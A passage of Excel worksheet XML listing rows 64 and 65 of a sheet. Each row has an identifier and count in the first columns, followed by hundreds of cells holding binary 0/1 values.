        <v>0</v>
      </c>
      <c r="JD64">
        <v>0</v>
      </c>
      <c r="JE64">
        <v>0</v>
      </c>
      <c r="JF64">
        <v>0</v>
      </c>
      <c r="JG64">
        <v>0</v>
      </c>
      <c r="JH64">
        <v>0</v>
      </c>
      <c r="JI64">
        <v>0</v>
      </c>
      <c r="JJ64">
        <v>1</v>
      </c>
      <c r="JK64">
        <v>0</v>
      </c>
      <c r="JL64">
        <v>0</v>
      </c>
      <c r="JM64">
        <v>0</v>
      </c>
      <c r="JN64">
        <v>0</v>
      </c>
      <c r="JO64">
        <v>0</v>
      </c>
      <c r="JP64">
        <v>0</v>
      </c>
      <c r="JQ64">
        <v>0</v>
      </c>
      <c r="JR64">
        <v>0</v>
      </c>
      <c r="JS64">
        <v>0</v>
      </c>
      <c r="JT64">
        <v>0</v>
      </c>
      <c r="JU64">
        <v>0</v>
      </c>
      <c r="JV64">
        <v>0</v>
      </c>
      <c r="JW64">
        <v>0</v>
      </c>
      <c r="JX64">
        <v>0</v>
      </c>
      <c r="JY64">
        <v>0</v>
      </c>
      <c r="JZ64">
        <v>0</v>
      </c>
      <c r="KA64">
        <v>1</v>
      </c>
      <c r="KB64">
        <v>0</v>
      </c>
      <c r="KC64">
        <v>0</v>
      </c>
      <c r="KD64">
        <v>0</v>
      </c>
      <c r="KE64">
        <v>0</v>
      </c>
      <c r="KF64">
        <v>0</v>
      </c>
      <c r="KG64">
        <v>0</v>
      </c>
      <c r="KH64">
        <v>0</v>
      </c>
      <c r="KI64">
        <v>0</v>
      </c>
      <c r="KJ64">
        <v>0</v>
      </c>
      <c r="KK64">
        <v>0</v>
      </c>
      <c r="KL64">
        <v>0</v>
      </c>
      <c r="KM64">
        <v>0</v>
      </c>
      <c r="KN64">
        <v>0</v>
      </c>
      <c r="KO64">
        <v>1</v>
      </c>
      <c r="KP64">
        <v>0</v>
      </c>
      <c r="KQ64">
        <v>0</v>
      </c>
      <c r="KR64">
        <v>0</v>
      </c>
      <c r="KS64">
        <v>0</v>
      </c>
      <c r="KT64">
        <v>0</v>
      </c>
      <c r="KU64">
        <v>0</v>
      </c>
      <c r="KV64">
        <v>0</v>
      </c>
      <c r="KW64">
        <v>0</v>
      </c>
      <c r="KX64">
        <v>0</v>
      </c>
      <c r="KY64">
        <v>0</v>
      </c>
      <c r="KZ64">
        <v>0</v>
      </c>
      <c r="LA64">
        <v>0</v>
      </c>
      <c r="LB64">
        <v>0</v>
      </c>
      <c r="LC64">
        <v>0</v>
      </c>
      <c r="LD64">
        <v>1</v>
      </c>
      <c r="LE64">
        <v>0</v>
      </c>
      <c r="LF64">
        <v>0</v>
      </c>
      <c r="LG64">
        <v>0</v>
      </c>
      <c r="LH64">
        <v>0</v>
      </c>
      <c r="LI64">
        <v>0</v>
      </c>
      <c r="LJ64">
        <v>1</v>
      </c>
      <c r="LK64">
        <v>0</v>
      </c>
      <c r="LL64">
        <v>0</v>
      </c>
      <c r="LM64">
        <v>1</v>
      </c>
      <c r="LN64">
        <v>0</v>
      </c>
      <c r="LO64">
        <v>0</v>
      </c>
      <c r="LP64">
        <v>0</v>
      </c>
      <c r="LQ64">
        <v>0</v>
      </c>
      <c r="LR64">
        <v>0</v>
      </c>
      <c r="LS64">
        <v>0</v>
      </c>
      <c r="LT64">
        <v>0</v>
      </c>
      <c r="LU64">
        <v>0</v>
      </c>
      <c r="LV64">
        <v>0</v>
      </c>
      <c r="LW64">
        <v>0</v>
      </c>
      <c r="LX64">
        <v>0</v>
      </c>
      <c r="LY64">
        <v>0</v>
      </c>
      <c r="LZ64">
        <v>0</v>
      </c>
      <c r="MA64">
        <v>0</v>
      </c>
      <c r="MB64">
        <v>0</v>
      </c>
      <c r="MC64">
        <v>0</v>
      </c>
      <c r="MD64">
        <v>0</v>
      </c>
      <c r="ME64">
        <v>0</v>
      </c>
      <c r="MF64">
        <v>0</v>
      </c>
      <c r="MG64">
        <v>0</v>
      </c>
      <c r="MH64">
        <v>0</v>
      </c>
      <c r="MI64">
        <v>0</v>
      </c>
      <c r="MJ64">
        <v>0</v>
      </c>
      <c r="MK64">
        <v>0</v>
      </c>
      <c r="ML64">
        <v>0</v>
      </c>
      <c r="MM64">
        <v>0</v>
      </c>
      <c r="MN64">
        <v>0</v>
      </c>
      <c r="MO64">
        <v>0</v>
      </c>
      <c r="MP64">
        <v>0</v>
      </c>
      <c r="MQ64">
        <v>0</v>
      </c>
      <c r="MR64">
        <v>0</v>
      </c>
      <c r="MS64">
        <v>0</v>
      </c>
      <c r="MT64">
        <v>0</v>
      </c>
      <c r="MU64">
        <v>0</v>
      </c>
      <c r="MV64">
        <v>0</v>
      </c>
      <c r="MW64">
        <v>0</v>
      </c>
      <c r="MX64">
        <v>0</v>
      </c>
      <c r="MY64">
        <v>0</v>
      </c>
      <c r="MZ64">
        <v>0</v>
      </c>
      <c r="NA64">
        <v>0</v>
      </c>
      <c r="NB64">
        <v>0</v>
      </c>
      <c r="NC64">
        <v>0</v>
      </c>
      <c r="ND64">
        <v>0</v>
      </c>
      <c r="NE64">
        <v>0</v>
      </c>
      <c r="NF64">
        <v>0</v>
      </c>
      <c r="NG64">
        <v>0</v>
      </c>
      <c r="NH64">
        <v>0</v>
      </c>
      <c r="NI64">
        <v>0</v>
      </c>
      <c r="NJ64">
        <v>0</v>
      </c>
      <c r="NK64">
        <v>0</v>
      </c>
      <c r="NL64">
        <v>0</v>
      </c>
      <c r="NM64">
        <v>0</v>
      </c>
      <c r="NN64">
        <v>0</v>
      </c>
      <c r="NO64">
        <v>0</v>
      </c>
      <c r="NP64">
        <v>0</v>
      </c>
      <c r="NQ64">
        <v>0</v>
      </c>
      <c r="NR64">
        <v>0</v>
      </c>
      <c r="NS64">
        <v>0</v>
      </c>
      <c r="NT64">
        <v>0</v>
      </c>
      <c r="NU64">
        <v>0</v>
      </c>
      <c r="NV64">
        <v>0</v>
      </c>
      <c r="NW64">
        <v>0</v>
      </c>
      <c r="NX64">
        <v>0</v>
      </c>
      <c r="NY64">
        <v>0</v>
      </c>
      <c r="NZ64">
        <v>0</v>
      </c>
      <c r="OA64">
        <v>0</v>
      </c>
      <c r="OB64">
        <v>0</v>
      </c>
      <c r="OC64">
        <v>0</v>
      </c>
      <c r="OD64">
        <v>0</v>
      </c>
      <c r="OE64">
        <v>0</v>
      </c>
      <c r="OF64">
        <v>0</v>
      </c>
      <c r="OG64">
        <v>0</v>
      </c>
      <c r="OH64">
        <v>0</v>
      </c>
      <c r="OI64">
        <v>0</v>
      </c>
      <c r="OJ64">
        <v>0</v>
      </c>
      <c r="OK64">
        <v>0</v>
      </c>
      <c r="OL64">
        <v>0</v>
      </c>
      <c r="OM64">
        <v>0</v>
      </c>
      <c r="ON64">
        <v>0</v>
      </c>
      <c r="OO64">
        <v>0</v>
      </c>
      <c r="OP64">
        <v>0</v>
      </c>
      <c r="OQ64">
        <v>0</v>
      </c>
      <c r="OR64">
        <v>0</v>
      </c>
      <c r="OS64">
        <v>0</v>
      </c>
      <c r="OT64">
        <v>0</v>
      </c>
      <c r="OU64">
        <v>0</v>
      </c>
      <c r="OV64">
        <v>0</v>
      </c>
      <c r="OW64">
        <v>0</v>
      </c>
      <c r="OX64">
        <v>0</v>
      </c>
      <c r="OY64">
        <v>0</v>
      </c>
      <c r="OZ64">
        <v>0</v>
      </c>
      <c r="PA64">
        <v>0</v>
      </c>
      <c r="PB64">
        <v>0</v>
      </c>
      <c r="PC64">
        <v>0</v>
      </c>
      <c r="PD64">
        <v>0</v>
      </c>
      <c r="PE64">
        <v>0</v>
      </c>
      <c r="PF64">
        <v>0</v>
      </c>
      <c r="PG64">
        <v>0</v>
      </c>
      <c r="PH64">
        <v>0</v>
      </c>
      <c r="PI64">
        <v>0</v>
      </c>
      <c r="PJ64">
        <v>0</v>
      </c>
      <c r="PK64">
        <v>0</v>
      </c>
      <c r="PL64">
        <v>0</v>
      </c>
      <c r="PM64">
        <v>0</v>
      </c>
      <c r="PN64">
        <v>0</v>
      </c>
      <c r="PO64">
        <v>0</v>
      </c>
      <c r="PP64">
        <v>0</v>
      </c>
      <c r="PQ64">
        <v>0</v>
      </c>
      <c r="PR64">
        <v>0</v>
      </c>
      <c r="PS64">
        <v>0</v>
      </c>
      <c r="PT64">
        <v>0</v>
      </c>
      <c r="PU64">
        <v>0</v>
      </c>
      <c r="PV64">
        <v>0</v>
      </c>
      <c r="PW64">
        <v>0</v>
      </c>
      <c r="PX64">
        <v>0</v>
      </c>
      <c r="PY64">
        <v>0</v>
      </c>
      <c r="PZ64">
        <v>0</v>
      </c>
      <c r="QA64">
        <v>0</v>
      </c>
      <c r="QB64">
        <v>0</v>
      </c>
      <c r="QC64">
        <v>0</v>
      </c>
      <c r="QD64">
        <v>0</v>
      </c>
      <c r="QE64">
        <v>0</v>
      </c>
      <c r="QF64">
        <v>0</v>
      </c>
      <c r="QG64">
        <v>0</v>
      </c>
      <c r="QH64">
        <v>0</v>
      </c>
      <c r="QI64">
        <v>0</v>
      </c>
      <c r="QJ64">
        <v>0</v>
      </c>
      <c r="QK64">
        <v>0</v>
      </c>
      <c r="QL64">
        <v>0</v>
      </c>
      <c r="QM64">
        <v>0</v>
      </c>
      <c r="QN64">
        <v>0</v>
      </c>
      <c r="QO64">
        <v>0</v>
      </c>
      <c r="QP64">
        <v>0</v>
      </c>
      <c r="QQ64">
        <v>0</v>
      </c>
      <c r="QR64">
        <v>0</v>
      </c>
      <c r="QS64">
        <v>0</v>
      </c>
      <c r="QT64">
        <v>0</v>
      </c>
      <c r="QU64">
        <v>0</v>
      </c>
      <c r="QV64">
        <v>0</v>
      </c>
      <c r="QW64">
        <v>0</v>
      </c>
      <c r="QX64">
        <v>0</v>
      </c>
      <c r="QY64">
        <v>0</v>
      </c>
      <c r="QZ64">
        <v>0</v>
      </c>
      <c r="RA64">
        <v>0</v>
      </c>
      <c r="RB64">
        <v>0</v>
      </c>
      <c r="RC64">
        <v>0</v>
      </c>
      <c r="RD64">
        <v>0</v>
      </c>
      <c r="RE64">
        <v>0</v>
      </c>
      <c r="RF64">
        <v>0</v>
      </c>
      <c r="RG64">
        <v>0</v>
      </c>
      <c r="RH64">
        <v>0</v>
      </c>
      <c r="RI64">
        <v>0</v>
      </c>
      <c r="RJ64">
        <v>0</v>
      </c>
      <c r="RK64">
        <v>0</v>
      </c>
      <c r="RL64">
        <v>0</v>
      </c>
      <c r="RM64">
        <v>0</v>
      </c>
      <c r="RN64">
        <v>0</v>
      </c>
      <c r="RO64">
        <v>0</v>
      </c>
      <c r="RP64">
        <v>0</v>
      </c>
      <c r="RQ64">
        <v>0</v>
      </c>
      <c r="RR64">
        <v>0</v>
      </c>
      <c r="RS64">
        <v>0</v>
      </c>
      <c r="RT64">
        <v>0</v>
      </c>
      <c r="RU64">
        <v>0</v>
      </c>
      <c r="RV64">
        <v>0</v>
      </c>
      <c r="RW64">
        <v>0</v>
      </c>
      <c r="RX64">
        <v>0</v>
      </c>
      <c r="RY64">
        <v>0</v>
      </c>
      <c r="RZ64">
        <v>0</v>
      </c>
      <c r="SA64">
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A65" s="6" t="s">
        <v>3129</v>
      </c>
      <c r="B65">
        <v>44</v>
      </c>
      <c r="C65">
        <v>0</v>
      </c>
      <c r="D65">
        <v>0</v>
      </c>
      <c r="E65">
        <v>0</v>
      </c>
      <c r="F65">
        <v>0</v>
      </c>
      <c r="G65">
        <v>0</v>
      </c>
      <c r="H65">
        <v>0</v>
      </c>
      <c r="I65">
        <v>1</v>
      </c>
      <c r="J65">
        <v>0</v>
      </c>
      <c r="K65">
        <v>0</v>
      </c>
      <c r="L65">
        <v>0</v>
      </c>
      <c r="M65">
        <v>0</v>
      </c>
      <c r="N65">
        <v>0</v>
      </c>
      <c r="O65">
        <v>0</v>
      </c>
      <c r="P65">
        <v>0</v>
      </c>
      <c r="Q65">
        <v>0</v>
      </c>
      <c r="R65">
        <v>0</v>
      </c>
      <c r="S65">
        <v>0</v>
      </c>
      <c r="T65">
        <v>1</v>
      </c>
      <c r="U65">
        <v>0</v>
      </c>
      <c r="V65">
        <v>0</v>
      </c>
      <c r="W65">
        <v>0</v>
      </c>
      <c r="X65">
        <v>0</v>
      </c>
      <c r="Y65">
        <v>0</v>
      </c>
      <c r="Z65">
        <v>0</v>
      </c>
      <c r="AA65">
        <v>0</v>
      </c>
      <c r="AB65">
        <v>0</v>
      </c>
      <c r="AC65">
        <v>0</v>
      </c>
      <c r="AD65">
        <v>0</v>
      </c>
      <c r="AE65">
        <v>0</v>
      </c>
      <c r="AF65">
        <v>0</v>
      </c>
      <c r="AG65">
        <v>0</v>
      </c>
      <c r="AH65">
        <v>0</v>
      </c>
      <c r="AI65">
        <v>0</v>
      </c>
      <c r="AJ65">
        <v>0</v>
      </c>
      <c r="AK65">
        <v>1</v>
      </c>
      <c r="AL65">
        <v>0</v>
      </c>
      <c r="AM65">
        <v>0</v>
      </c>
      <c r="AN65">
        <v>0</v>
      </c>
      <c r="AO65">
        <v>0</v>
      </c>
      <c r="AP65">
        <v>0</v>
      </c>
      <c r="AQ65">
        <v>0</v>
      </c>
      <c r="AR65">
        <v>0</v>
      </c>
      <c r="AS65">
        <v>1</v>
      </c>
      <c r="AT65">
        <v>0</v>
      </c>
      <c r="AU65">
        <v>0</v>
      </c>
      <c r="AV65">
        <v>0</v>
      </c>
      <c r="AW65">
        <v>0</v>
      </c>
      <c r="AX65">
        <v>0</v>
      </c>
      <c r="AY65">
        <v>0</v>
      </c>
      <c r="AZ65">
        <v>0</v>
      </c>
      <c r="BA65">
        <v>0</v>
      </c>
      <c r="BB65">
        <v>0</v>
      </c>
      <c r="BC65">
        <v>0</v>
      </c>
      <c r="BD65">
        <v>0</v>
      </c>
      <c r="BE65">
        <v>0</v>
      </c>
      <c r="BF65">
        <v>0</v>
      </c>
      <c r="BG65">
        <v>0</v>
      </c>
      <c r="BH65">
        <v>0</v>
      </c>
      <c r="BI65">
        <v>0</v>
      </c>
      <c r="BJ65">
        <v>0</v>
      </c>
      <c r="BK65">
        <v>0</v>
      </c>
      <c r="BL65">
        <v>0</v>
      </c>
      <c r="BM65">
        <v>0</v>
      </c>
      <c r="BN65">
        <v>1</v>
      </c>
      <c r="BO65">
        <v>0</v>
      </c>
      <c r="BP65">
        <v>0</v>
      </c>
      <c r="BQ65">
        <v>0</v>
      </c>
      <c r="BR65">
        <v>0</v>
      </c>
      <c r="BS65">
        <v>1</v>
      </c>
      <c r="BT65">
        <v>0</v>
      </c>
      <c r="BU65">
        <v>0</v>
      </c>
      <c r="BV65">
        <v>0</v>
      </c>
      <c r="BW65">
        <v>0</v>
      </c>
      <c r="BX65">
        <v>0</v>
      </c>
      <c r="BY65">
        <v>0</v>
      </c>
      <c r="BZ65">
        <v>0</v>
      </c>
      <c r="CA65">
        <v>0</v>
      </c>
      <c r="CB65">
        <v>0</v>
      </c>
      <c r="CC65">
        <v>0</v>
      </c>
      <c r="CD65">
        <v>0</v>
      </c>
      <c r="CE65">
        <v>1</v>
      </c>
      <c r="CF65">
        <v>1</v>
      </c>
      <c r="CG65">
        <v>0</v>
      </c>
      <c r="CH65">
        <v>0</v>
      </c>
      <c r="CI65">
        <v>1</v>
      </c>
      <c r="CJ65">
        <v>0</v>
      </c>
      <c r="CK65">
        <v>0</v>
      </c>
      <c r="CL65">
        <v>0</v>
      </c>
      <c r="CM65">
        <v>0</v>
      </c>
      <c r="CN65">
        <v>0</v>
      </c>
      <c r="CO65">
        <v>0</v>
      </c>
      <c r="CP65">
        <v>0</v>
      </c>
      <c r="CQ65">
        <v>0</v>
      </c>
      <c r="CR65">
        <v>0</v>
      </c>
      <c r="CS65">
        <v>0</v>
      </c>
      <c r="CT65">
        <v>0</v>
      </c>
      <c r="CU65">
        <v>0</v>
      </c>
      <c r="CV65">
        <v>0</v>
      </c>
      <c r="CW65">
        <v>0</v>
      </c>
      <c r="CX65">
        <v>0</v>
      </c>
      <c r="CY65">
        <v>0</v>
      </c>
      <c r="CZ65">
        <v>0</v>
      </c>
      <c r="DA65">
        <v>0</v>
      </c>
      <c r="DB65">
        <v>0</v>
      </c>
      <c r="DC65">
        <v>0</v>
      </c>
      <c r="DD65">
        <v>0</v>
      </c>
      <c r="DE65">
        <v>0</v>
      </c>
      <c r="DF65">
        <v>0</v>
      </c>
      <c r="DG65">
        <v>0</v>
      </c>
      <c r="DH65">
        <v>0</v>
      </c>
      <c r="DI65">
        <v>0</v>
      </c>
      <c r="DJ65">
        <v>0</v>
      </c>
      <c r="DK65">
        <v>0</v>
      </c>
      <c r="DL65">
        <v>0</v>
      </c>
      <c r="DM65">
        <v>0</v>
      </c>
      <c r="DN65">
        <v>1</v>
      </c>
      <c r="DO65">
        <v>1</v>
      </c>
      <c r="DP65">
        <v>0</v>
      </c>
      <c r="DQ65">
        <v>0</v>
      </c>
      <c r="DR65">
        <v>0</v>
      </c>
      <c r="DS65">
        <v>0</v>
      </c>
      <c r="DT65">
        <v>0</v>
      </c>
      <c r="DU65">
        <v>0</v>
      </c>
      <c r="DV65">
        <v>0</v>
      </c>
      <c r="DW65">
        <v>0</v>
      </c>
      <c r="DX65">
        <v>0</v>
      </c>
      <c r="DY65">
        <v>0</v>
      </c>
      <c r="DZ65">
        <v>0</v>
      </c>
      <c r="EA65">
        <v>0</v>
      </c>
      <c r="EB65">
        <v>0</v>
      </c>
      <c r="EC65">
        <v>0</v>
      </c>
      <c r="ED65">
        <v>0</v>
      </c>
      <c r="EE65">
        <v>0</v>
      </c>
      <c r="EF65">
        <v>0</v>
      </c>
      <c r="EG65">
        <v>0</v>
      </c>
      <c r="EH65">
        <v>0</v>
      </c>
      <c r="EI65">
        <v>0</v>
      </c>
      <c r="EJ65">
        <v>0</v>
      </c>
      <c r="EK65">
        <v>0</v>
      </c>
      <c r="EL65">
        <v>0</v>
      </c>
      <c r="EM65">
        <v>0</v>
      </c>
      <c r="EN65">
        <v>0</v>
      </c>
      <c r="EO65">
        <v>0</v>
      </c>
      <c r="EP65">
        <v>0</v>
      </c>
      <c r="EQ65">
        <v>0</v>
      </c>
      <c r="ER65">
        <v>0</v>
      </c>
      <c r="ES65">
        <v>0</v>
      </c>
      <c r="ET65">
        <v>0</v>
      </c>
      <c r="EU65">
        <v>0</v>
      </c>
      <c r="EV65">
        <v>0</v>
      </c>
      <c r="EW65">
        <v>0</v>
      </c>
      <c r="EX65">
        <v>0</v>
      </c>
      <c r="EY65">
        <v>1</v>
      </c>
      <c r="EZ65">
        <v>0</v>
      </c>
      <c r="FA65">
        <v>0</v>
      </c>
      <c r="FB65">
        <v>0</v>
      </c>
      <c r="FC65">
        <v>1</v>
      </c>
      <c r="FD65">
        <v>0</v>
      </c>
      <c r="FE65">
        <v>0</v>
      </c>
      <c r="FF65">
        <v>0</v>
      </c>
      <c r="FG65">
        <v>0</v>
      </c>
      <c r="FH65">
        <v>0</v>
      </c>
      <c r="FI65">
        <v>0</v>
      </c>
      <c r="FJ65">
        <v>0</v>
      </c>
      <c r="FK65">
        <v>0</v>
      </c>
      <c r="FL65">
        <v>0</v>
      </c>
      <c r="FM65">
        <v>0</v>
      </c>
      <c r="FN65">
        <v>0</v>
      </c>
      <c r="FO65">
        <v>0</v>
      </c>
      <c r="FP65">
        <v>0</v>
      </c>
      <c r="FQ65">
        <v>0</v>
      </c>
      <c r="FR65">
        <v>0</v>
      </c>
      <c r="FS65">
        <v>0</v>
      </c>
      <c r="FT65">
        <v>0</v>
      </c>
      <c r="FU65">
        <v>0</v>
      </c>
      <c r="FV65">
        <v>0</v>
      </c>
      <c r="FW65">
        <v>0</v>
      </c>
      <c r="FX65">
        <v>0</v>
      </c>
      <c r="FY65">
        <v>0</v>
      </c>
      <c r="FZ65">
        <v>0</v>
      </c>
      <c r="GA65">
        <v>0</v>
      </c>
      <c r="GB65">
        <v>0</v>
      </c>
      <c r="GC65">
        <v>1</v>
      </c>
      <c r="GD65">
        <v>0</v>
      </c>
      <c r="GE65">
        <v>0</v>
      </c>
      <c r="GF65">
        <v>0</v>
      </c>
      <c r="GG65">
        <v>0</v>
      </c>
      <c r="GH65">
        <v>0</v>
      </c>
      <c r="GI65">
        <v>0</v>
      </c>
      <c r="GJ65">
        <v>0</v>
      </c>
      <c r="GK65">
        <v>0</v>
      </c>
      <c r="GL65">
        <v>0</v>
      </c>
      <c r="GM65">
        <v>0</v>
      </c>
      <c r="GN65">
        <v>1</v>
      </c>
      <c r="GO65">
        <v>0</v>
      </c>
      <c r="GP65">
        <v>0</v>
      </c>
      <c r="GQ65">
        <v>1</v>
      </c>
      <c r="GR65">
        <v>0</v>
      </c>
      <c r="GS65">
        <v>1</v>
      </c>
      <c r="GT65">
        <v>0</v>
      </c>
      <c r="GU65">
        <v>0</v>
      </c>
      <c r="GV65">
        <v>0</v>
      </c>
      <c r="GW65">
        <v>0</v>
      </c>
      <c r="GX65">
        <v>1</v>
      </c>
      <c r="GY65">
        <v>0</v>
      </c>
      <c r="GZ65">
        <v>0</v>
      </c>
      <c r="HA65">
        <v>0</v>
      </c>
      <c r="HB65">
        <v>0</v>
      </c>
      <c r="HC65">
        <v>0</v>
      </c>
      <c r="HD65">
        <v>0</v>
      </c>
      <c r="HE65">
        <v>0</v>
      </c>
      <c r="HF65">
        <v>1</v>
      </c>
      <c r="HG65">
        <v>0</v>
      </c>
      <c r="HH65">
        <v>0</v>
      </c>
      <c r="HI65">
        <v>0</v>
      </c>
      <c r="HJ65">
        <v>0</v>
      </c>
      <c r="HK65">
        <v>0</v>
      </c>
      <c r="HL65">
        <v>1</v>
      </c>
      <c r="HM65">
        <v>0</v>
      </c>
      <c r="HN65">
        <v>0</v>
      </c>
      <c r="HO65">
        <v>0</v>
      </c>
      <c r="HP65">
        <v>0</v>
      </c>
      <c r="HQ65">
        <v>0</v>
      </c>
      <c r="HR65">
        <v>0</v>
      </c>
      <c r="HS65">
        <v>0</v>
      </c>
      <c r="HT65">
        <v>0</v>
      </c>
      <c r="HU65">
        <v>0</v>
      </c>
      <c r="HV65">
        <v>1</v>
      </c>
      <c r="HW65">
        <v>0</v>
      </c>
      <c r="HX65">
        <v>0</v>
      </c>
      <c r="HY65">
        <v>0</v>
      </c>
      <c r="HZ65">
        <v>0</v>
      </c>
      <c r="IA65">
        <v>0</v>
      </c>
      <c r="IB65">
        <v>1</v>
      </c>
      <c r="IC65">
        <v>0</v>
      </c>
      <c r="ID65">
        <v>0</v>
      </c>
      <c r="IE65">
        <v>0</v>
      </c>
      <c r="IF65">
        <v>1</v>
      </c>
      <c r="IG65">
        <v>0</v>
      </c>
      <c r="IH65">
        <v>0</v>
      </c>
      <c r="II65">
        <v>0</v>
      </c>
      <c r="IJ65">
        <v>0</v>
      </c>
      <c r="IK65">
        <v>0</v>
      </c>
      <c r="IL65">
        <v>0</v>
      </c>
      <c r="IM65">
        <v>0</v>
      </c>
      <c r="IN65">
        <v>0</v>
      </c>
      <c r="IO65">
        <v>0</v>
      </c>
      <c r="IP65">
        <v>0</v>
      </c>
      <c r="IQ65">
        <v>0</v>
      </c>
      <c r="IR65">
        <v>0</v>
      </c>
      <c r="IS65">
        <v>0</v>
      </c>
      <c r="IT65">
        <v>0</v>
      </c>
      <c r="IU65">
        <v>1</v>
      </c>
      <c r="IV65">
        <v>0</v>
      </c>
      <c r="IW65">
        <v>0</v>
      </c>
      <c r="IX65">
        <v>0</v>
      </c>
      <c r="IY65">
        <v>0</v>
      </c>
      <c r="IZ65">
        <v>0</v>
      </c>
      <c r="JA65">
        <v>0</v>
      </c>
      <c r="JB65">
        <v>0</v>
      </c>
      <c r="JC65">
        <v>0</v>
      </c>
      <c r="JD65">
        <v>0</v>
      </c>
      <c r="JE65">
        <v>0</v>
      </c>
      <c r="JF65">
        <v>0</v>
      </c>
      <c r="JG65">
        <v>0</v>
      </c>
      <c r="JH65">
        <v>0</v>
      </c>
      <c r="JI65">
        <v>0</v>
      </c>
      <c r="JJ65">
        <v>1</v>
      </c>
      <c r="JK65">
        <v>0</v>
      </c>
      <c r="JL65">
        <v>0</v>
      </c>
      <c r="JM65">
        <v>0</v>
      </c>
      <c r="JN65">
        <v>0</v>
      </c>
      <c r="JO65">
        <v>0</v>
      </c>
      <c r="JP65">
        <v>0</v>
      </c>
      <c r="JQ65">
        <v>1</v>
      </c>
      <c r="JR65">
        <v>0</v>
      </c>
      <c r="JS65">
        <v>0</v>
      </c>
      <c r="JT65">
        <v>0</v>
      </c>
      <c r="JU65">
        <v>0</v>
      </c>
      <c r="JV65">
        <v>0</v>
      </c>
      <c r="JW65">
        <v>0</v>
      </c>
      <c r="JX65">
        <v>0</v>
      </c>
      <c r="JY65">
        <v>0</v>
      </c>
      <c r="JZ65">
        <v>0</v>
      </c>
      <c r="KA65">
        <v>1</v>
      </c>
      <c r="KB65">
        <v>0</v>
      </c>
      <c r="KC65">
        <v>0</v>
      </c>
      <c r="KD65">
        <v>0</v>
      </c>
      <c r="KE65">
        <v>0</v>
      </c>
      <c r="KF65">
        <v>0</v>
      </c>
      <c r="KG65">
        <v>0</v>
      </c>
      <c r="KH65">
        <v>0</v>
      </c>
      <c r="KI65">
        <v>0</v>
      </c>
      <c r="KJ65">
        <v>0</v>
      </c>
      <c r="KK65">
        <v>0</v>
      </c>
      <c r="KL65">
        <v>0</v>
      </c>
      <c r="KM65">
        <v>0</v>
      </c>
      <c r="KN65">
        <v>0</v>
      </c>
      <c r="KO65">
        <v>1</v>
      </c>
      <c r="KP65">
        <v>0</v>
      </c>
      <c r="KQ65">
        <v>0</v>
      </c>
      <c r="KR65">
        <v>0</v>
      </c>
      <c r="KS65">
        <v>0</v>
      </c>
      <c r="KT65">
        <v>1</v>
      </c>
      <c r="KU65">
        <v>0</v>
      </c>
      <c r="KV65">
        <v>0</v>
      </c>
      <c r="KW65">
        <v>0</v>
      </c>
      <c r="KX65">
        <v>0</v>
      </c>
      <c r="KY65">
        <v>0</v>
      </c>
      <c r="KZ65">
        <v>0</v>
      </c>
      <c r="LA65">
        <v>0</v>
      </c>
      <c r="LB65">
        <v>0</v>
      </c>
      <c r="LC65">
        <v>0</v>
      </c>
      <c r="LD65">
        <v>1</v>
      </c>
      <c r="LE65">
        <v>1</v>
      </c>
      <c r="LF65">
        <v>0</v>
      </c>
      <c r="LG65">
        <v>0</v>
      </c>
      <c r="LH65">
        <v>0</v>
      </c>
      <c r="LI65">
        <v>0</v>
      </c>
      <c r="LJ65">
        <v>1</v>
      </c>
      <c r="LK65">
        <v>0</v>
      </c>
      <c r="LL65">
        <v>0</v>
      </c>
      <c r="LM65">
        <v>1</v>
      </c>
      <c r="LN65">
        <v>0</v>
      </c>
      <c r="LO65">
        <v>0</v>
      </c>
      <c r="LP65">
        <v>0</v>
      </c>
      <c r="LQ65">
        <v>0</v>
      </c>
      <c r="LR65">
        <v>0</v>
      </c>
      <c r="LS65">
        <v>0</v>
      </c>
      <c r="LT65">
        <v>0</v>
      </c>
      <c r="LU65">
        <v>0</v>
      </c>
      <c r="LV65">
        <v>1</v>
      </c>
      <c r="LW65">
        <v>0</v>
      </c>
      <c r="LX65">
        <v>0</v>
      </c>
      <c r="LY65">
        <v>0</v>
      </c>
      <c r="LZ65">
        <v>0</v>
      </c>
      <c r="MA65">
        <v>0</v>
      </c>
      <c r="MB65">
        <v>0</v>
      </c>
      <c r="MC65">
        <v>0</v>
      </c>
      <c r="MD65">
        <v>1</v>
      </c>
      <c r="ME65">
        <v>0</v>
      </c>
      <c r="MF65">
        <v>0</v>
      </c>
      <c r="MG65">
        <v>0</v>
      </c>
      <c r="MH65">
        <v>0</v>
      </c>
      <c r="MI65">
        <v>0</v>
      </c>
      <c r="MJ65">
        <v>0</v>
      </c>
      <c r="MK65">
        <v>0</v>
      </c>
      <c r="ML65">
        <v>0</v>
      </c>
      <c r="MM65">
        <v>0</v>
      </c>
      <c r="MN65">
        <v>0</v>
      </c>
      <c r="MO65">
        <v>0</v>
      </c>
      <c r="MP65">
        <v>0</v>
      </c>
      <c r="MQ65">
        <v>0</v>
      </c>
      <c r="MR65">
        <v>0</v>
      </c>
      <c r="MS65">
        <v>0</v>
      </c>
      <c r="MT65">
        <v>0</v>
      </c>
      <c r="MU65">
        <v>0</v>
      </c>
      <c r="MV65">
        <v>0</v>
      </c>
      <c r="MW65">
        <v>0</v>
      </c>
      <c r="MX65">
        <v>0</v>
      </c>
      <c r="MY65">
        <v>0</v>
      </c>
      <c r="MZ65">
        <v>0</v>
      </c>
      <c r="NA65">
        <v>0</v>
      </c>
      <c r="NB65">
        <v>0</v>
      </c>
      <c r="NC65">
        <v>0</v>
      </c>
      <c r="ND65">
        <v>0</v>
      </c>
      <c r="NE65">
        <v>0</v>
      </c>
      <c r="NF65">
        <v>0</v>
      </c>
      <c r="NG65">
        <v>0</v>
      </c>
      <c r="NH65">
        <v>0</v>
      </c>
      <c r="NI65">
        <v>0</v>
      </c>
      <c r="NJ65">
        <v>0</v>
      </c>
      <c r="NK65">
        <v>0</v>
      </c>
      <c r="NL65">
        <v>0</v>
      </c>
      <c r="NM65">
        <v>0</v>
      </c>
      <c r="NN65">
        <v>0</v>
      </c>
      <c r="NO65">
        <v>0</v>
      </c>
      <c r="NP65">
        <v>0</v>
      </c>
      <c r="NQ65">
        <v>0</v>
      </c>
      <c r="NR65">
        <v>0</v>
      </c>
      <c r="NS65">
        <v>0</v>
      </c>
      <c r="NT65">
        <v>0</v>
      </c>
      <c r="NU65">
        <v>0</v>
      </c>
      <c r="NV65">
        <v>0</v>
      </c>
      <c r="NW65">
        <v>0</v>
      </c>
      <c r="NX65">
        <v>0</v>
      </c>
      <c r="NY65">
